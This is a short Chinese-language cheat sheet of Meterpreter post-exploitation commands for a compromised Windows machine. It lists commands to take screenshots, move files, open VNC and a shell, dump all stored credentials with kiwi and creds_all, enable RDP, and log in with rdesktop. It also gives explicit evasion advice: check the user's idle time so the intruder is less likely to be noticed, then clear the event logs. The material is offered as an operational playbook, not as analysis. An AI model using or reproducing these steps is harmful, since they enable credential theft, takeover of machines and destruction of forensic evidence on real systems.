1.捕获屏幕
meterpreter > screenshot
2.上传/下载文件
meterpreter > upload hello.txt c://
meterpreter > download d://1.txt
3. 远程桌面
meterpreter > run vnc
4.获得cmd
meterpreter > shell
5.获取用户密码
meterpreter > load kiwi
Kiwi在32位系统中能够正常使用,到了64位系统中需要用到进程迁移
meterpreter > creds_all
6.启用远程桌面,配合上一步获取到的密码。
meterpreter > run post/windows/manage/enable_rdp
使用时一般配合查看远程用户的空闲时长,空闲时间长再进行远程登陆,减小被发现的风险。登录rdp会把对方顶掉。
meterpreter > idletime
7.使用 rdesktop 命令远程连接桌面
root@kali:~# rdesktop 192.168.2.6
8.清除日志
meterpreter > clearev